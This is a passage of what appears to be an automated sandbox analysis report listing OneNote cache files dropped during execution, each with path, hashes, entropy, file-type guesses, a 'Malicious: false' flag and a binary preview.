Preview:	2...>.....................................................................................................................................................................................................$.......$.j.I..^N..l2..h.......h...OE...K...>..h...OE...K...>..h...$.j.I..^N..l2..$................................h.......h...................................................h..#....h\......hN......................................................$..c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s................h..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..............M.t.89.......N...^................................................................................................................M.t.89.......................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4847905959826573
Encrypted:	false
SSDEEP:	6:NTcQ/MqBT65PBTgKl/YUYjeyLx8Olu3afTrlww1EOsLrlM:Vc9suvl/HV38/iQED3a
MD5:	D902A65598FCA84FFF841D98273AC1D6
SHA1:	77AFDC4EB1824A93485D35D0C1835DB0BC702195
SHA-256:	AA0E3A4B671A9FE77A998987EA8D5D9718858EBB4ADB4025CEF2615124BC8D6D
SHA-512:	AD22FB1FE012446534D1A5019A541868E96DC12B331816541064897CB168339F9E8C5B6854A5894A3240141A5A96ED59025FB39E0766F9F17B7C06CF989FFF6C
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................r{P.....r{P..6.I................................r{P..6.I........r{P..................................................r{P.....r{P.................................................r{P.....r{P\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...^.y...\E.dU.........N...^...........................................................................................................^.y...\E.dU.................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.4558209987553303
Encrypted:	false
SSDEEP:	12:RpX8ykfiE06v8Cw4N4qXD1MCDuYYzmTGPY9iwIWscecQEwXi9cn:vXwwoSCbYzm2Y9/sqEA
MD5:	3F4C4C9598199C5F57B981784FC45C05
SHA1:	80DDE3E3EE51089021F0DF1F7EB42751D16517B5
SHA-256:	7B7A120ADF527AE999ABCC283894E6301E41B69BEE3EAE7EB5AADF8629BC6CE6
SHA-512:	BB551FDDBAC038AFC0103881157584D0CF8CF5F2F132815835E486E3DA6C8EB182C4E5E95F4AF01593A97641761AB8CAC8C673C474BAE70E9961D273B6C1AC61
Malicious:	false
Preview:	........ ...........................................................................................................................................................................................................SJKJ...@?.G.q~T.....q~T..d.D..d.I[@..,...?@....x;NN.,.q~T..d.D..d.I[@.q~T......G.K.....u.6.............q~T.....q~T.................................................q~T..@..q~T\....q~TN....q~TN.)..q~TN.6..q~TN.>..........................w....c..,.........................4..1...(...(.......U.s.e.r........q~T..1... ..$....U.s.e.r...........w.......w...n..H..G...<R.............G.K.....u.62...................................q~T.......................................c..,...................q~T.q~T..1... ..$....U.s.e.r.......w...n..H..G...<Rw.......SJKJ...@?.G..........G.K.....u.6........>...............q~T..d.D..d.I[@...........................................,..c..,...................q~T.q~T.q~T..1... ..$....U.s.e.r............,.....*.,...?@....x;NNq~T.....q~T..d.D..d.I[@.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7112180439240621
Encrypted:	false
SSDEEP:	6:jxfES5WYr1f8zn8f8z/wtuiodC0x8CAXCknnWWAXl6dIYXrw1E9dIYXn:KO8q8kthYWXnW9XlcIY7QEXIY3
MD5:	5FC0ABE93AF7CE59348A8E30C269CAEC
SHA1:	13290D252F6CC176FBF2F2EE89738C20E5E66A87
SHA-256:	59F39805EC860E382EEDC781DEF5A1A06C2123D8E690C047C02994668B204EC3
SHA-512:	1FD2C1D3E81EDF7EAEAF24C362B3CCD4840B18CE2212BF8376D9A0472D93ADF23A887B2F7953D342034FF1957BE813FA35018FD6293AC7A033DB2F9746C23535
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................]......].c..I.3.4...a.......a.. e.C.:7s.....a.. e.C.:7s.....a...].c..I.3.4...]...............................a.......a...................................................a...!...a.\.....a.N.....................................................]..c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........a...1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.............)...-.mI...Qp......N...^...........................................................................................................)...-.mI...Qp..............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4838140334826573
Encrypted:	false
SSDEEP:	6:NTc+3lFmc4f+f/m75JlyLx8Olu3afh8oxmw1EuE8o/0:VcOL4f+f/m7LlV38HxmQEjM
MD5:	D49375AD90004F8FE85FADF9D398805D
SHA1:	92E703B8C5779D479FB40FFB9F1EFF6774700092
SHA-256:	3A966174479454F6450BF00B61E50AFC89B173C2F83E4BFF84F553FE4363CCA8
SHA-512:	759767F2307AC9B1E8FBAD05EF9A693CD6B068B1C12AFA9F203C2F649D7DB47B30D5492C6C5A9D2594FBBF33ADC99FA4F6D4145C84FA26B2CB365751FC5105E8
Malicious:	false
Preview:	2...>...........~....................................................................................................................................................................................................x}E..5;(..............................x}E..5;(.............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....SP...kO..Ze.,......N...^............................................................................................................SP...kO..Ze.,..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7352923879375559
Encrypted:	false
SSDEEP:	6:K0nCHwL5Wj+YWAPpdh9+YPXGlLMsEtHlc/sqxrx+Xx8felBkls0Cv1D7elBkls0e:KUCe5WFPNclV/ngQeIWJ7eIWc1GQEag
MD5:	23C9849E64391464B12F39218AD8804E
SHA1:	0260C89D7C0579F4768338AB54A048A2251F36B8
SHA-256:	F8CD4606E30FB391FEC0C7A965B56523EECCB8C4E8D11FCBFCBC5C5253394963
SHA-512:	13DED86370DCA6058C78F767187D1E3799C1A9B4CFAA3FF4593CACC890017591D8A8FE4AD35FE6313F200EA83DBFD77581DB56AEB6C4753C8CB6AE108767C248
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................-X......-X..}.L........v......v..D\|CO..[..qH..-X..}.L.........-X.v..D\|CO..[..qH.v...............................v......v..................................................v..."..v.\....v.N.....................................................-X..c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..............v...1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........`& .Z.}D....h.kd....N...^...........................................................................................................`& .Z.}D....h.kd....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.48277285611290854
Encrypted:	false
SSDEEP:	6:NTch4BJqKQ8R4BJqnEpB4ayLx8Olu3afd9cqw1EoI9cS:Vch4Bw8R4Bf4aV38d6qQEoI6S
MD5:	90F99DC6534202512160A9396C1BF6BF
SHA1:	CBAC4DD8C8BE1C438B0DE784A7080EC3E5E7748E
SHA-256:	818930948CFE325B1619CB4E36A70227FEB1188733EF83F31484C1FB0ADA78D8
SHA-512:	7066CCB2D1AACBBB3345BCEE148DA7314A230BED492ECCC793811BD41D32295A8FDE2A2F8A53C74C7A70B8CCDEA74ED7207B8148A1B38578D951431D841AC8B8
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................$.......$.....B..l.T...........................$.....B..l.T...$....................................................$.......$...................................................$.......$..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...x.J....M.......v....N...^...........................................................................................................x.J....M.......v............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6489251876747785
Encrypted:	false
SSDEEP:	12:UeEg/GsLsMWua+nkNYKQQnkNYU1pQEP1SK:Uie+kNbQQkNH1pb1
MD5:	F1B531BDC992B3174F2F0F4579E95DB0
SHA1:	F8AB1351149C53D429FC8F8F9308B471F7FA5F43
SHA-256:	A6B563EECE7289C6EC921338DD51C32489EF68B01A787A488545699BF785F0C8
SHA-512:	BE370EEEF46AB26CF6FB9ABA2624481BF14C751E21BBD748514D3D31A6B42D7ADC77DC139E164729B401019F0E45F56EFE825E657C1D0B30AA8AB69125F29CBC
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................7C......7C..9H.F.l/i..Q.........................7C..9H.F.l/i..Q.7C...................................................7C......7C..................................................7C..."..7C.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s..........}.....H...=jf......N...^............................................................................................................}.....H...=jf..............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.797344507962055
Encrypted:	false
SSDEEP:	12:+wfEGLLdHUVnHryoo5/sD4nwsD4CcduIQElduU:+eL2VLy15/nnwnFdTL
MD5:	2AE878D272758C6FACBA6441CC48F437
SHA1:	3278EB9D78374DE8F73805A1F9B05554E10B5BC2
SHA-256:	F0FAFFACD6FF91F7D68243A4A2856B68AA43CCC3F3D248B12DC7A38125F99126
SHA-512:	21EE5C226C9F8ACD3EBD40994C5D9B0FADDF422505591369B757D9B5CFCE3158FAA89DFDB3EB806FB17C708EDF3287BFEA5261881A3436215A7F7A09E16551CB
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................,.......,..m.C..t1.sKT.p.......p...tM....[..,..m.C..t1.sKT..,..p...tM....[..p.................................,.......,...................................................,..#....,\......,N.....................................................p...c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s................,..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........Y..BH.F...........N...^...........................................................................................................Y..BH.F...........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47963448868803715
Encrypted:	false
SSDEEP:	6:NTcWLJkuWJklSlliF6XyLx8Olu3afnRw1EM4B:VceVS/maV38RQEMq
MD5:	458C9C97FB82E0673FDEF3CFE5CC25BC
SHA1:	4F740B7CBCE927F2AA3F64FC8E88FB54BA89D6F2
SHA-256:	4111809A992677EF0E3AB0F9B276D1350E8848120733B7AADC32B4FCFBA3960F
SHA-512:	1C8BA6C5FCCCDFFDB0BB2AAE11AC60F640638789CBC4F6B2C16C686A788F6D823B59840D6CAC3E37B05587F8CF123AB9DA58C0AA96C62C5F89CD0A44B154753F
Malicious:	false
Preview:	2...>...........~.........................................................................................................................................................................................L.......L..S,K..F.Y.iJ..........................L..S,K..F.Y.iJ..L....................................................L.......L...................................................L.......L\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.......00SF..s .W.P....N...^...............................................................................................................00SF..s .W.P............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.0043605762827883
Encrypted:	false
SSDEEP:	12:DKzsRXyWcOFvYtXDwVbS14huprydX+5dkYQE8k:DMCXyl45VbA0akYQ
MD5:	B33B1A6C0AFC9260776CA9F75B1AE9E3
SHA1:	A955AE4A64D99A05A0ABF6393BA32029597550DC
SHA-256:	1C8465BADE3F608D6BB9DC13A4A4DCCC48F1F4A1DBC0E867256B950AC20934B1
SHA-512:	B0EAA9C549017E19472C1828C62FC2CDC650B6369CA697DA5DB6CC61311E431FFAC0C579E93A9DB2B8249B5DEF1598F4829E9CF3171FCF7938EF1C276C6217D0
Malicious:	false
Preview:	....>..........................?......?.................................................................................................................................................................7.......7...U..L...^.9...e;......e;7.1B...C-,..e;7.1B...C-,.e;.3...j.K.j8...K.3...7...U..L...^.9..7............7.......7...................................................7....-..7..\.....e;N.(....................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...................e;.. ..$...........e;......e;7.1B...C-,.3.......3...j.K.j8...K.2...............................7........................................3....c..,....................e;.. ..$p............4....J..HD................e;.. ..$p................Mi@..u..<'q.........%E.;B... nHr"....N...^..............................................................................................................%E.;B... nHr"....................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.9489162959129714
Encrypted:	false
SSDEEP:	12:BKKmIRhtexlhmDIik13/yulBY5lWTH6erQE/6en:uIomDIieNO5leaerGe
MD5:	58CF24F024B314BCB99E3C9965D166B3
SHA1:	EE95B01629347B13173F92FB6613695F3FF1BA52
SHA-256:	5A060CC8A4F543C7FD262F6F41C5A3FE977EC00E3D789E9B4F72C484E1435D4A
SHA-512:	FB73FB57C82EC56EB81D32390DF22A4C99CDCA7C3AED837B7A7802ADAB2C1847B64CF731B82839031D571E5626401C137A5F52A34CA7E23F810151823FDD88DE
Malicious:	false
Preview:	....>.............................?...?..................................................................................................................................................................V.......V....\O..]....x].......]...C.mD.M....\.]...C.mD.M....\.]....ma./9N.@w'sp...ma..V....\O..]....x.V............V.......V...................................................V...,...V.\.....V.N.....V.N.)............................................4..1...(...(.......1.6........................]....c..,....................V... ..$..........].......]...C.mD.M....\..ma......ma./9N.@w'sp..2................................V........................................ma..c..,....................V...V... ..$............V...V... ..$p............De.q.2M.j.#!C:............)7@=\|.B..w.yU.....N...^............................................................................................................)7@=\|.B..w.yU.....................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5042175539118636
Encrypted:	false
SSDEEP:	24:MAS7B8k060VmatvxlgeB6zMOriNJVWJUHJUFR:MjSu01bgbHiv+2eR
MD5:	07F2252988AE9BB02936FFE462468A39
SHA1:	BEC017D0CFB7A11949306731A6FD93FED252C833
SHA-256:	28ABC8A08BEF5E27FA663325F73D4B644246E5BF458A98DE5AFEE4E95E4AF05B
SHA-512:	0D41C674380B807D1D1D3B95ABCF99263C147A4F5FC1289BCC4DC7289507C46299E84C048E9676FEE45FA82203A8FCB7577B308EB3A2BDA1FE3D80AD4451788F
Malicious:	false
Preview:	........$..................................?............................................................................................................................................................Ak......Ak.Z=?.N...;=...............gH..]...,t.z..J..B.K...7AG.z...a.....C......+ .a.......gH..]...,t..............a.......a...................................................a...@...a.\.....a.N.....a.N.)...a.N.8...a.N.<............................4..1...(...(.......M.a.n.a.g.e.d.......................z...c..,....................a... ..$...........a.......a.....C......+ .z.......z..J..B.K...7A.2....................................a........................................c..,....................a...a... ..$....................H..1...<..z.......z..J..B.K...7AG......H..1...<..........gH..]...,t....Ak.Z=?.N...;=..Ak......>................a.....C......+ ..............................................c..,....................a...a...a... ..$...................Ak...c..,....................a.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7626113472615781
Encrypted:	false
SSDEEP:	6:bEhIJkLtfMj9ItsBX3a1Lx8CAXCV+lk/aue1v7lBMf4Xetqw1EwftS:bEhyqtE/B3a1YXIS1JGf4etqQEEtS
MD5:	98564B42227D680DE62AFBE595DBDCF4
SHA1:	73EB57AC1D94B07D2121FFEB7CFE1C8A818D580E
SHA-256:	9A99ED611D99A593788D27A6666111518360443A58819C693F21DBD9CB5CC915
SHA-512:	B47FF82CBBE5A4EDB6807F61BA2D9986E9E7122A3DCC49C5CFA116115361E9C79110947B0457F31F66E6C7B9C8BA243D9E5C9CDD42FA963DC45D86BB31136846
Malicious:	false
Preview:	2...>..............................................................................................................................................................................................................%...L.0...@.............L.H.....P5....L.H.....P5.......%...L.0...@...................................................................................................#.....\.......N. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........................c..,........................ ..$.................... ..$p...............id.A...u.J........ .Y....N..R0-.......N...^........................................................................................................... .Y....N..R0-...............................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5217058826682069
Encrypted:	false
SSDEEP:	6:jhzcRlnlBm4NuBth0JkAaq/yLx8Olu34Bjlcw1E5tlK:jRcDREBth0JAq/V3+cQEz0
MD5:	11CEEB52741CE02B94532CDB4FA0C5FD
SHA1:	09C35DCC6E57527CA57C3100427F1A676373F9B2
SHA-256:	DE202B541583D6701B4BE5E5D2DE2DBD27DAFE7BA21AE6DF50101CF9C09330B3
SHA-512:	761D5110AD3CE4BC174136D2C206FEA1FA20C4DD865C7746ECBA3749E61DA248533E8308201E1DD184F0B7A2A0FDDC3344B2E6C9834A7E065B930E2176431E3A
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................g>......g>c9.HI.....c.Q.........................g>c9.HI.....c.Q.g>...................................................g>......g>..................................................g>......g>\..............................................................4..1...(...(.......1.0.3.3.................p........[Z.v:F..;`y................roNJ.a1!..k.....N...^..............................................................................................................roNJ.a1!..k.....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7647438825966435
Encrypted:	false
SSDEEP:	12:D0CoqMZuETZTdMqEZseIWE01jbBbcQE9Bk:QhNul+RAbBbcxB
MD5:	69C584E737B01094382AF14724AAC546
SHA1:	A3BB757ED798B2705260C2974A043709D2BFFACA
SHA-256:	5C9D507D4C4AE5B85BA12CBE1BB4995FFEAEF68E7B29134B124E90DFBCAA4721
SHA-512:	07C906C1F173C49A64D94C0405DE794E2307D65C96798524587D0CD1727B5BB06991734E163B0AD0C2C078829259BFED7FC40A4E7E62C83F0803B300A2AAAE50
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................h.t.....h.t..3rM.....3-.............n.I..1.bP.......n.I..1.bP......h.t..3rM.....3-.h.t...............................................................................................$.....\.......N. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........................h.t..c..,........................ ..$.................... ..$p..............[...G....1..o.......k.+...N...\|.u^a....N...^............................................................................................................k.+...N...\|.u^a....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5288265363138713
Encrypted:	false
SSDEEP:	6:jhzcGDwzeRY9lll5oYyHtcDYDuTJlyLx8Olu33qHghqw1EfS:jRcqdRAt5ottsYDIJlV33qMqQEfS
MD5:	20D8ADDFAA6CEF2A18612458B61579E6
SHA1:	8F738645F13BB37095B629B2FBD373B60802D759
SHA-256:	0C5EBE4DC6D9446A4BB8CD3ACD82B9585E1988221D08AE19752CFC5BAA317C2B
SHA-512:	169DCC967B60FF6C4BBFC876217765531943C62C7611F79F51674A2FB7A1DB380BAD7A88C70B784C17BE91DA6DCC316693195B7779854BD93AF928176033FCF4
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................f.......f.v...J...m..K..........................f.v...J...m..K.f....................................................f.......f...................................................f.......f.\..............................................................4..1...(...(.......1.0.3.3.................p.........a..OqF./k7..6...........k.6Mk.]D.......\....N...^...........................................................................................................k.6Mk.]D.......\....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6144161181938137
Encrypted:	false
SSDEEP:	6:90ChaPHltoSowaP8P4nN7QpqELx88cbrMkq2Sz1sm4NXJLqw1EHHLS:eCMP3obvPvdynkNYqm4qQEHrS
MD5:	4D13D57927BE1E77BAC9FCB7949FA208
SHA1:	04B6D9B9700FA086AB42E0D327D842641EEA67F7
SHA-256:	AF96DBF05A13B6EAAFCDB87F750C46200A09A6B3A72C6BB0E93B0767C48FB52D
SHA-512:	11CAE2C4D01FB919040B5157C1B6A82FCCCDECC91094B5C74AEF2421FAF748AE7D5F8635B2ED88C565D3384A30F22FC88F0DF01997D297B2E399C6B15BDC9190
Malicious:	false
Preview:	2...>..................................................................................................................................................................................................................E.p.G..#................................E.p.G..#......................................................................................................................".....\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p.......S._08?.H..c.l.............].....I..!,.......N...^............................................................................................................].....I..!,.......................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.809539555761264
Encrypted:	false
SSDEEP:	12:EE8rdFxE4GefZvsD4LYjS1JimETIQE2TFK:wLGeftnLYx/kq
MD5:	5AC9AFADB81D56BBF38202FE491B4EEA
SHA1:	64FE8A11125E6B5AE8A34FDA80CE498728D29CBA
SHA-256:	60C459B8F77A65A82D5D46BFBCC36C008F7BD3D9D8553FBA35BFEF61CB6A369E
SHA-512:	2907CE9F380EC2FB250E0BAAC57DBA0F1332CA131E5425615FFCDB372443EB59A6775827E49D9BCC6CC4DE9A942A4E395C869B6C8B1B02A7F1EDE725FE67E0D4
Malicious:	false
Preview:	2...>..............................................................................................................................................................................................................9..oM./.G+..d.".......".f...O...6Z.....9..oM./.G+..d.....".f...O...6Z..."................................................................................................%.....\.......N."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........................."...c..,........................ ..$.................... ..$p..............k...E.....c\#.......1\|S..ZM...\|\......N...^............................................................................................................1\|S..ZM...\|\..............................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5259500780304734
Encrypted:	false
SSDEEP:	6:jhzcqa/QoH/IQG8FyLx8Olu39Pb1Xs5vYw1E4P5vk:jRc/pQkV39z1GvYQE4hvk
MD5:	D6A1E128764E0FBFB86468E9766C6FBA
SHA1:	27F000238F23513BF390B947BCFE01C6F8872143
SHA-256:	953680050A3EA0F1CF10364598AA3CF0A7DD502283A0553C943083152DB5FB59
SHA-512:	EEEACD65A11AC7BEF482383833BD53F945F9E9F2BBB85E190F20D78533CD2497E83DD4B21F0D3ED1FFA00DCEF1C947A03616879C45CDF075482E88B53DFE5D4C
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................V......VV..@...?..G..........................VV..@...?..G..V...................................................V......V..................................................V......V\..............................................................4..1...(...(.......1.0.3.3.................p.......%l..P.=B.......Y...........`....yN.F....X[....N...^............................................................................................................`....yN.F....X[....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5116591298102606
Encrypted:	false
SSDEEP:	12:dyhkOdE/M0MVe3Ze1fXb0M1eRG/LrM/jGd5z/kSIoRm/Wc3++QEQlGfrH6QEyLHi:L/MxEUx0u//M/Wz/hIo8/HOzEQsOe
MD5:	1F38DBD40D269D31FA3D2D7A0896182C
SHA1:	0ED3FDFEFFD154DC0D8D0CAC3793F9F1B35F85B5
SHA-256:	94633B6AA89CD45ACB51871448D76EEF6CC4B7AE7D6FC5DABA2BFBABABA4AC27
SHA-512:	FF2B0FF3AF76A8D9F55C26C2D319EA12505B31F1BF45B9B3A92162F2E53DBDC778B6F39882817CEEDC6FE2BC7371832EC9F53B25ED52C0CA4A37788FD0E4D006
Malicious:	false
Preview:	..................................?......................................................................................................................................................................."......."$...I.i....%..oz......ozt/.gO.:.....7eE..1.@.d];iU$.7eE.......0C..=u.?......:R...q.E..Yv6o..:R............."......."..................................................."..B...."\......"N......"N.)...."N.7...."N.>............................4..1...(...(.......U.s.e.r.....................oz..c..,.....................".. ..$..........7eE.....7eE..1.@.d];iU$..oz......ozt/.gO.:.....2.................................".7eE..oz..............................7eE..c..,....................."...".. ..$.......oz......ozt/.gO.:....:R......:R...q.E..Yv6o...."$...I.i....%..."..ozt/.gO.:.....oz.........................>...............:R...q.E..Yv6o...........................................:R...c..,....................."..."...".. ..$........................0C..=u.?..:R......:R...q.E..Yv6o..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7626421186156778
Encrypted:	false
SSDEEP:	6:bEIaconltl03glltO6gdLx8CAXCVWk/2k1If7Rlt1FN/lww1ETo:bEIacolXxM3dYXC71o7DLLtwQETo
MD5:	0190FFF8913F39894A8C8077BBA07781
SHA1:	EA81D955855F61AB9DBBF0B981A1C9B415E7155F
SHA-256:	075A78230AE113791430C2CBEB61F85771B5183A320F9E3811C6C7C172F2F7D2
SHA-512:	F779554C39A01119650522146C200220D77D32FBA9995ED60A6166B6C635096269C09F60A152AE56566A484847B80597A197C44483D2CBDB82E6172DBD9E160C
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................#'......#'....J.....N\|..=S......=S..g_A........=S..g_A........=S..#'....J.....N\|..#'...............................#'......#'..................................................#'..#...#'\.....#'N. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.......................=S..c..,....................#'.. ..$................#'.. ..$p.............h.J..J..bx..P........p...A.E....I.u....N...^............................................................................................................p...A.E....I.u............................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5235168180614654
Encrypted:	false
SSDEEP:	6:jhzcPyIL7yVrlT7KyLx8Olu3mZp67XTpCVh6Zmw1EVpCVh6X0:jRcxiVhKV3mZpGTpOIZmQEVpOIk
MD5:	6FE311A0F659366FE8362C1C35916302
SHA1:	617318E0E452E53DCF8E8C32F8B65C670B277B5E
SHA-256:	8418127AD476CAEFF4654EEC04013E37CC02CF7A69E2EAB2D5ABFE936F010DE8
SHA-512:	E49EE43B7CE5F955C4DAC15DF42838D4D147C548CDB3E767E619A7B63996DDABCC8A4976C725CCF7CCB79E7919BE4B5D677999E497AF8D34666E8F0C8B0D22A6
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................D.......D..B..D.................................D..B..D.........D....................................................D.......D...................................................D.......D.\..............................................................4..1...(...(.......1.0.3.3.................p.......!.;1b..O...R..............{.erQL..`..`).....N...^............................................................................................................{.erQL..`..`).....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7629723521553758
Encrypted:	false
